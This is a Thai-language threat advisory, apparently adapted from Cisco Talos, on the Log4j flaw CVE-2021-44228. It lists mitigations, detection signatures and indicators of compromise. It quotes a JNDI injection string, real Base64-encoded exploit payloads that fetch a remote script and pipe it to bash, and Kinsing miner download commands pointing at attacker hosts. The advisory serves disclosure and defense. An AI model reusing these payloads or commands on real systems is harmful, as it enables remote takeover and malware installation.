Cisco Talos ได้ออกมาให้คำแนะนำเกี่ยวเหตุการณ์ที่มีการตรวจพบการใช้ช่องโหว่ที่มีระดับความรุนแรงสูงของ Apache Log4j ที่ถูกนำไปใช้โจมตีอย่างแพร่หลายในปัจจุบัน

 • อัพเดทข้อมูล ณ วันที่ 10 ธันวาคม 2564
  Cisco Talos ได้ตรวจพบการพยายามโจมตีเพื่อหวังหาผลประโยชน์บนเครือข่าย Honeypots และ Telemetry เซนเซอร์
 • อัพเดทข้อมูล ณ วันที่ 11 ธันวาคม 2564
  ได้มีการออกมาอัปเดตข้อมูลว่า Log4j เวอร์ชั่น 1. X ไม่พบช่องโหว่ในเวอร์ดังกล่าวและมีการเปิดเผยข้อมูลรายละเอียดของ Cisco Secure Endpoint Cloud IOCs

ข้อมูลรายละเอียดเพิ่มเติม

 • CVE-2021-44228 คือ ช่องโหว่ที่มีอยู่ใน Apache Log4j ที่เป็นไลบรารีการบันทึกของ Java ที่มีการใช้งานกันอย่างแพร่หลายในองค์กรขนาดใหญ่หลายแห่งและจนถึงตอนนี้เป้าหมายหลักได้มีการรวมถึงบริษัท Apple และวีดีโอเกมยอดนิยมอย่าง Minecraft
 • Apache ได้มีการปล่อยตัวอัปเดต Apache Log4j เวอร์ชั่น 2.15.0 ที่ได้มีการแก้ไขช่องโหว่ CVE-2021-44228 ที่มีอยู่ในเวอร์ชั่นก่อนหน้าและได้มีการแนะนำผู้ใช้งานที่ไม่แน่ใจว่า Apache Log4j ที่ใช้งานอยู่มีช่องโหว่ดังกล่าวหรือไม่ให้รีบดำเนินการอัปเกรดเวอร์ชันเพื่อแก้ไขช่องโหว่ทันที

ช่องโหว่การเรียกใช้คำสั่งที่เป็นอันตรายจากระยะไกลที่ไม่ผ่านการตรวจสอบสิทธ์ที่มีระดับความรุนแรง CVSS สูงสุด 10 (CVE-2021-44228) ถูกตรวจพบบนไลบรารีที่ได้รับความนิยมอย่าง Apache Log4j โดยได้รับการเปิดเผยถึงรายละเอียดเกี่ยวกับช่องโหว่ที่อาจทำให้ผู้โจมตีสามารถเข้าควบคุมเซิร์ฟเวอร์ที่ได้รับผลกระทบได้ และเชื่อว่าเป็นช่องโหว่ที่สามารถใช้เพื่อหาประโยชน์ได้ง่าย

Apache Foundation Log4j คือ ไลบรารีสำหรับใช้บันทึกที่ถูกออกแบบมาเพื่อแทนที่ built-in log4j package ที่ได้รับความนิยมใช้งานในโครงการ Java ยอดนิยมต่างๆ เช่น Apache Struts 2 และ Apache Solr อย่างไรก็ตามไลบรารีนี้ยังมีการถูกนำไปใช้ในเว็บแอพพลิเคชั่นต่างๆ ที่พบในสภาพแวดล้อมขององค์กรและรวมถึงบริษัท Elastic ทำให้ Cisco Talos เชื่อว่าช่องโหว่นี้จะถูกนำไปใช้ประโยชน์อย่างกว้างขวางในอนาคตและผู้ใช้งานไลบรารี Log4j ควรรีบดำเนินการอัปเกรดเวอร์ชันเพื่อแก้ไขช่องโหว่ทันที

Cisco Talos ได้เปิดเผยถึงข้อมูล Snort SID ที่สามารถนำไปใช้ในการตรวจหาการพยายามโจมตีด้วยช่องโหว่ CVE-2021-44228 ได้แก่ : 58722 - 58739 และ 300055 - 300057 และนอกเหนือจากนี้ยังมี ClamAV signatures สองรายการได้แก้ Java.Exploit.CVE_2021_44228-9914600-1 และ Java.Exploit.CVE_2021_44228-9914601-1

รายละเอียดช่องโหว่
ช่องโหว่นี้มีอยู่ใน JNDI ที่เป็นส่วนประกอบของ LDAP ที่ช่วยทำให้ผู้โจมตีสามารถดึงข้อมูลเพย์โหลดจากเซิร์ฟเวอร์ระยะไกลและดำเนินการภายในเครื่อง
อย่างไรก็ได้มีการเผยแพร่ถึงข้อพิสูจน์ แนวคิด และคำแนะนำเกี่ยวกับช่องโหว่ดังกล่าวแล้วซึ่งสามารถใช้เพื่อเรียกค้นและเรียกใช้ malicious class file ได้
ช่องโหว่นี้อยู่ในการใช้งาน Java Naming และ Directory Interface (JNDI) และสามารถทริกเกอร์ได้โดยใช้คำขอ LDAP ดังตัวอย่างข้างใต้

${jndi:ldap://attacker_controled_website/payload_to_be_executed}

คะแนนความความเสี่ยงของ Kenna สำหรับ CVE-2021-44228 คือ 93 จาก 100 คะแนน ซึ่งเป็นคะแนนที่หาได้ยากเนื่องจาก CVE ที่มีอยู่มากกว่า 165,000 รายการในปัจจุบันมีเพียง 0.39 เปอร์เซ็นต์ที่ได้รับคะแนนความเสี่ยงจาก Kenna ที่ 93 คะแนนขึ้นไป และสะท้อนถึงความรุนแรงและผลกระทบที่อาจเกิดขึ้นจากช่องโหว่

การลดบรรเทาความเสี่ยงในการถูกโจมตี
Apache ได้มีการปล่อย Apache Log4j เวอร์ชั่น 2.15.0 ที่เป็นตัวอัปเดตที่ได้มีการแก้ไขช่องโหว่ที่มีอยู่ในเวอร์ชั่นก่อนหน้าและและแนะนำผู้ใช้งานที่ไม่แน่ใจว่า Apache Log4j ที่ใช้งานอยู่มีช่องโหว่หรือไม่ให้รีบดำเนินการอัปเดตเวอร์ชันทันที

ในกรณีที่ไม่สามารถอัปเดทได้ Apache Foundation ได้ให้ขอแนะนำการลดความเสี่ยงในการถูกโจมตีดังต่อไปนี้

 • ผู้ใช้งาน Log4j เวอร์ชั่น 2.10 หรือสูงกว่านั้นให้เพิ่ม -Dlog4j.formatMsgNoLookups=true เป็น command-line option หรือ log4j.formatMsgNoLookups=true ในไฟล์ log4j2.component.properties บน classpath เพื่อป้องกันการค้นหาในข้อความบันทึกเหตุการณ์
 • ผู้ใช้งาน Log4j เวอร์ชั่น 2.7 ให้ทำการระบุ %m {nolookups}ในการกำหนดค่า PatternLayout เพื่อป้องกันการค้นหาในข้อความบันทึกเหตุการณ์
 • ลบ JndiLookup และ JndiManager classes ออกจาก log4j-core jar. แต่อย่างไรก็ตามการที่ลบ JndiManager จะส่งผลทำให้ JndiContextSelector และ and JMSAppender จะไม่สามารถทำงานได้
  การเฝ้าสังเกตการณ์กิจกรรมการแสดงหาประโยชน์จากช่องโหว่
  Cisco Talos กำลังเฝ้าสังเกตการแสดงหาประโยชน์อย่างแพร่หลายผ่าน telemetry และพบตัวอย่างของการพยายามหาประโยชน์อย่างใดอย่างหนึ่งที่สามารถเห็นได้ตามตัวอย่างข่างใต้

${jndi:ldap://45.155.205[.]233[:]12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS
4yMzM6NTg3NC9bdmljdGltIElQXTpbdmljdGltIHBvcnRdfHx3Z2V0IC1
xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0L1t2aWN0aW0gSVBdOlt2aWN0aW0gcG9ydF0pfGJhc2gK}

ข้อมูลที่มีการเข้ารหัส Base 64 ในตัวอย่างก่อนหน้านี้มีหน้าที่ในการนำส่งและเรียกดำเนินการเพย์โหลดที่เป็นอันตรายเพิ่มเติมดังตัวอย่างอย่างใต้

(curl -s 45[.]155[.]205[.]233[:]5874/[victim IP]:[victim port]||wget -q -O- 45[.]155[.]205[.]233[:]5874/[victim IP]:[victim port])|bash

ในหลายเหตุการณ์ที่การโจมตีประสบความสำเร็จผู้โจมตีจะมีการติดตั้ง cryptocurrency mining malware ลงบนเครื่องของเหยื่อ

ตัวอย่างข้างล่างนี้ คือ Cisco Secure Endpoint มีการตรวจพบกิจกรรมที่เกี่ยวข้องกับการนำส่ง Kinsing miner malware

รายชื่ออุปกรณ์ Cisco ที่สามารถตรวจจับและบล็อกการโจมตีได้

 • Cisco Secure Endpoint (AMP) สามารถป้องกันการทำงานของมัลแวร์บนเครื่องได้
 • Cisco Secure Firewall (Next-Generation Firewall และ Firepower NGFW) อุปกรณ์เช่น Threat Defense Virtual,
 • Adaptive Security Appliance และ Meraki MX สามารถตรวจจับกิจกรรมที่เป็นอันตรายที่เกี่ยวข้องกับภัยคุกคามนี้ได้
 • Cisco Secure Malware Analytics (Threat Grid) สามารถระบุไบนารีที่เป็นอันตรายและสร้างการป้องกันในอุปกรณ์ Cisco Secure ทั้งหมดได้
 • Umbrella (Internet GateWay) สามารถบล๊อคการเชื่อมต่อกับ Domains, IPs และ URLs ที่เป็นอันตรายได้ไม่ว่าผู้ใช้งานจะอยู่ภายในหรือนอกเครือข่ายขององค์กร

วิธีการป้องกันเพิ่มเติมสำหรับสภาพแวดล้อมเฉพาะที่ไม่มีอุปกรณ์ผลิตภัณฑ์ดังตัวอย่างก่อนหน้าและข้อมูลภัยคุกคามสามารถดูได้จาก Firewall Management Center

 • ลูกค้า Open-source Snort สามารถ Subscriber Rule Set เพื่อติดตามข่าวสารล่าสุดได้โดยการดาวน์โหลดชุด Rule ที่มีการจำหน่ายบน Snort.org. และ Snort SID ที่ได้รับการเปิดเผยดังต่อไปนี้สามารถใช้ในการตรวจหาการพยายามโจมตีด้วยช่องโหว่ได้ : 58722 - 58739 และ 300055 - 300057 ได้
 • นอกเหนือจากนี้ยังมี ClamAV Signatures สองรายการที่สามารถใช้ในการตรวจหาการพยายามโจมตีด้วยช่องโหว่ได้ คือ Java.Exploit.CVE_2021_44228-9914600-1 และ Java.Exploit.CVE_2021_44228-9914601-1

Cisco Secure Endpoint Cloud IOCs ได้อัปเดทข้อมูลเพื่อรวมการตรวจจับใหม่ดังต่อไปนี้

 • Linux.PossibleKinsingMalware.ioc

Security controls validates signatures :

INDICATORS OF COMPROMISE (IOCS)
รายการตัวบ่งชี้ที่มีความเกี่ยวข้องกับกิจกรรมการโจมตีเพื่อหาประโยชน์ผ่านช่องโหว่มีดังนี้

 • USER-AGENT HTTP HEADERS:

${jndi:ldap://015ed9119662[.]bingsearchlib[.]com:39356/a}
${jndi:ldap://32fce0c1f193[.]bingsearchlib[.]com:39356/a}
${jndi:ldap://3be6466b6a20[.]bingsearchlib[.]com:39356/a}
${jndi:ldap://6c8d7dd40593[.]bingsearchlib[.]com:39356/a}
${jndi:ldap://7faf976567f5[.]bingsearchlib[.]com:39356/a}
${jndi:ldap://e86eafcf9294[.]bingsearchlib[.]com:39356/a}
${jndi:ldap://80[.]71[.]158[.]12:5557/Basic/Command/Base64/KGN1cmwgLXMgODAuNzEuMTU4L
jEyL2xoLnNofHx3Z2V0IC1xIC1PLSA4MC43MS4xNTguMTIvbGguc2gpfGJhc2g=}
${jndi:ldap://45[.]155[.]205[.]233[:]12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS
4yMzM6NTg3NC9bdmljdGltIElQXTpbdmljdGltIHBvcnRdfHx3Z2V0IC
1xIC1PLSA0NS4xNTUuMjA1LjIzMzo1ODc0L1t2aWN0aW0gSVBdOlt2aWN0aW0gcG9ydF0pfGJhc2gK}

 • IPs:

89[.]234[.]182[.]139
88[.]80[.]20[.]86
81[.]17[.]18[.]60
72[.]223[.]168[.]73
68[.]183[.]44[.]143
68[.]183[.]198[.]247
62[.]76[.]41[.]46
62[.]102[.]148[.]69
54[.]173[.]99[.]121
51[.]255[.]106[.]85
51[.]15[.]43[.]205
46[.]182[.]21[.]248
46[.]166[.]139[.]111
45[.]155[.]205[.]233
45[.]153[.]160[.]138
45[.]153[.]160[.]131
45[.]12[.]134[.]108
23[.]129[.]64[.]148
23[.]129[.]64[.]146
23[.]129[.]64[.]141
23[.]129[.]64[.]131
213[.]164[.]204[.]146
212[.]193[.]57[.]225
209[.]141[.]41[.]103
209[.]127[.]17[.]242
205[.]185[.]117[.]149
204[.]8[.]156[.]142
199[.]195[.]250[.]77
198[.]98[.]51[.]189
195[.]254[.]135[.]76
195[.]19[.]192[.]26
195[.]176[.]3[.]24
194[.]48[.]199[.]78
193[.]31[.]24[.]154
193[.]218[.]118[.]231
193[.]218[.]118[.]183
193[.]189[.]100[.]203
193[.]189[.]100[.]195
188[.]166[.]92[.]228
188[.]166[.]48[.]55
188[.]166[.]122[.]43
185[.]83[.]214[.]69
185[.]38[.]175[.]132
185[.]220[.]102[.]8
185[.]220[.]102[.]249
185[.]220[.]102[.]242
185[.]220[.]101[.]61
185[.]220[.]101[.]57
185[.]220[.]101[.]56
185[.]220[.]101[.]55
185[.]220[.]101[.]54
185[.]220[.]101[.]49
185[.]220[.]101[.]46
185[.]220[.]101[.]45
185[.]220[.]101[.]43
185[.]220[.]101[.]42
185[.]220[.]101[.]41
185[.]220[.]101[.]39
185[.]220[.]101[.]37
185[.]220[.]101[.]36
185[.]220[.]101[.]35
185[.]220[.]101[.]34
185[.]220[.]101[.]33
185[.]220[.]101[.]191
185[.]220[.]101[.]189
185[.]220[.]101[.]186
185[.]220[.]101[.]185
185[.]220[.]101[.]182
185[.]220[.]101[.]181
185[.]220[.]101[.]180
185[.]220[.]101[.]179
185[.]220[.]101[.]177
185[.]220[.]101[.]175
185[.]220[.]101[.]172
185[.]220[.]101[.]171
185[.]220[.]101[.]169
185[.]220[.]101[.]168
185[.]220[.]101[.]163
185[.]220[.]101[.]161
185[.]220[.]101[.]160
185[.]220[.]101[.]158
185[.]220[.]101[.]157
185[.]220[.]101[.]156
185[.]220[.]101[.]154
185[.]220[.]101[.]153
185[.]220[.]101[.]149
185[.]220[.]101[.]148
185[.]220[.]101[.]147
185[.]220[.]101[.]146
185[.]220[.]101[.]145
185[.]220[.]101[.]144
185[.]220[.]101[.]143
185[.]220[.]101[.]142
185[.]220[.]101[.]141
185[.]220[.]101[.]139
185[.]220[.]101[.]138
185[.]220[.]101[.]134
185[.]220[.]101[.]129
185[.]220[.]100[.]255
185[.]220[.]100[.]254
185[.]220[.]100[.]253
185[.]220[.]100[.]252
185[.]220[.]100[.]249
185[.]220[.]100[.]248
185[.]220[.]100[.]247
185[.]220[.]100[.]246
185[.]220[.]100[.]245
185[.]220[.]100[.]244
185[.]220[.]100[.]243
185[.]220[.]100[.]242
185[.]220[.]100[.]241
185[.]220[.]100[.]240
185[.]129[.]61[.]1
185[.]107[.]47[.]171
185[.]100[.]87[.]41
185[.]100[.]87[.]202
181[.]214[.]39[.]2
18[.]27[.]197[.]252
178[.]62[.]79[.]49
178[.]17[.]171[.]102
171[.]25[.]193[.]78
171[.]25[.]193[.]77
171[.]25[.]193[.]25
171[.]25[.]193[.]20
167[.]99[.]172[.]58
167[.]99[.]172[.]213
167[.]99[.]164[.]201
164[.]90[.]199[.]216
159[.]65[.]58[.]66
159[.]65[.]155[.]208
151[.]115[.]60[.]113
147[.]182[.]219[.]9
147[.]182[.]169[.]254
147[.]182[.]167[.]165
143[.]198[.]45[.]117
143[.]198[.]32[.]72
142[.]93[.]34[.]250
137[.]184[.]106[.]119
137[.]184[.]102[.]82
134[.]122[.]34[.]28
122[.]161[.]50[.]23
116[.]24[.]67[.]213
109[.]70[.]100[.]34
109[.]237[.]96[.]124
107[.]189[.]14[.]98
107[.]189[.]12[.]135
107[.]189[.]1[.]178
107[.]189[.]1[.]160
104[.]244[.]79[.]6
104[.]244[.]76[.]170
104[.]244[.]74[.]57
104[.]244[.]74[.]211
104[.]244[.]72[.]115

 • KINSING MINING ACTIVITY: Commands:

curl -o /tmp/kinsing hxxp[:]//80[.]71[.]158[.]12/kinsing
curl -o /tmp/libsystem.so http[:]//80[.]71[.]158[.]12/libsystem[.]so
curl -o /etc/kinsing hxxp[:]//80[.]71[.]158[.]12/kinsing
chmod 777 /tmp/kinsing
chattr -R -i /var/spool/cron
chmod +x /etc/kinsing

 • URLs:

hxxp[:]//45[.]137[.]155[.]55/ex[.]sh
hxxp[:]//45[.]137[.]155[.]55/kinsing
hxxp[:]//80[.]71[.]158[.]12/libsystem.so
hxxp[:]//80[.]71[.]158[.]12/kinsing
hxxp[:]//80[.]71[.]158[.]12/Exploit69ogQNSQYz[.]class

 • Hashes (SHA256):

006fc6623fbb961084243cfc327c885f3c57f2eba8ee05fbc4e93e5358778c85
bf4f41403280c1b115650d470f9b260a5c9042c04d9bcc2a6ca504a66379b2d6
58e9f72081efff9bdaabd82e3b3efe5b1b9f1666cefe28f429ad7176a6d770ae
ed285ad5ac6a8cf13461d6c2874fdcd3bf67002844831f66e21c2d0adda43fa4
dbf88c623cc2ad99d82fa4c575fb105e2083465a47b84d64e2e1a63e183c274e
a38ddff1e797adb39a08876932bc2538d771ff7db23885fb883fec526aff4fc8
7d86841489afd1097576a649094ae1efb79b3147cd162ba019861dfad4e9573b
4bfb0d5022dc499908da4597f3e19f9f64d3cc98ce756a2249c72179d3d75c47
473f15c04122dad810c919b2f3484d46560fd2dd4573f6695d387195816b02a6
b3fae4f84d4303cdbad4696554b4e8d2381ad3faf6e0c3c8d2ce60a4388caa02
dcde6033b205433d6e9855c93740f798951fa3a3f252035a768d9f356fde806d
85338f694c844c8b66d8a1b981bcf38627f95579209b2662182a009d849e1a4c
db3906edad6009d1886ec1e2a198249b6d99820a3575f8ec80c6ce57f08d521a
ec411a34fee49692f196e4dc0a905b25d0667825904862fdba153df5e53183e0
a00a54e3fb8cb83fab38f8714f240ecc13ab9c492584aa571aec5fc71b48732d
c584d1000591efa391386264e0d43ec35f4dbb146cad9390f73358d9c84ee78d
8bdb662843c1f4b120fb4c25a5636008085900cdf9947b1dadb9b672ea6134dc
c830cde8f929c35dad42cbdb6b28447df69ceffe99937bf420d32424df4d076a
6ae3b0cb657e051f97835a6432c2b0f50a651b36b6d4af395bbe9060bb4ef4b2
535e19bf14d8c76ec00a7e8490287ca2e2597cae2de5b8f1f65eb81ef1c2a4c6
42de36e61d454afff5e50e6930961c85b55d681e23931efd248fd9b9b9297239
4f53e4d52efcccdc446017426c15001bb0fe444c7a6cdc9966f8741cf210d997
df00277045338ceaa6f70a7b8eee178710b3ba51eac28c1142ec802157492de6
28433734bd9e3121e0a0b78238d5131837b9dbe26f1a930bc872bad44e68e44e
cf65f0d33640f2cd0a0b06dd86a5c6353938ccb25f4ffd14116b4884181e0392
5bb84e110d5f18cee47021a024d358227612dd6dac7b97fa781f85c6ad3ccee4
ccf02bb919e1a44b13b366ea1b203f98772650475f2a06e9fac4b3c957a7c3fa
815a73e20e90a413662eefe8594414684df3d5723edcd76070e1a5aee864616e
10ef331115cbbd18b5be3f3761e046523f9c95c103484082b18e67a7c36e570c
dc815be299f81c180aa8d2924f1b015f2c46686e866bc410e72de75f7cd41aae
9275f5d57709e2204900d3dae2727f5932f85d3813ad31c9d351def03dd3d03d
f35ccc9978797a895e5bee58fa8c3b7ad6d5ee55386e9e532f141ee8ed2e937d
5256517e6237b888c65c8691f29219b6658d800c23e81d5167c4a8bbd2a0daa3
d4485176aea67cc85f5ccc45bb66166f8bfc715ae4a695f0d870a1f8d848cc3d
3fcc4c1f2f806acfc395144c98b8ba2a80fe1bf5e3ad3397588bbd2610a37100
057a48fe378586b6913d29b4b10162b4b5045277f1be66b7a01fb7e30bd05ef3
5dbd6bb2381bf54563ea15bc9fbb6d7094eaf7184e6975c50f8996f77bfc3f2c
c39b0ea14e7766440c59e5ae5f48adee038d9b1c7a1375b376e966ca12c22cd3
6f38a25482d82cd118c4255f25b9d78d96821d22bab498cdce9cda7a563ca992
54962835992e303928aa909730ce3a50e311068c0960c708e82ab76701db5e6b
e5e9b0f8d72f4e7b9022b7a83c673334d7967981191d2d98f9c57dc97b4caae1
68d793940c28ddff6670be703690dfdf9e77315970c42c4af40ca7261a8570fa
9da0f5ca7c8eab693d090ae759275b9db4ca5acdbcfe4a63d3871e0b17367463
8933820cf2769f6e7f1a711e188f551c3d5d3843c52167a34ab8d6eabb0a63ef
6e25ad03103a1a972b78c642bac09060fa79c460011dc5748cbb433cc459938b
c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a

ที่มา: talosintelligence.com  picussecurity.com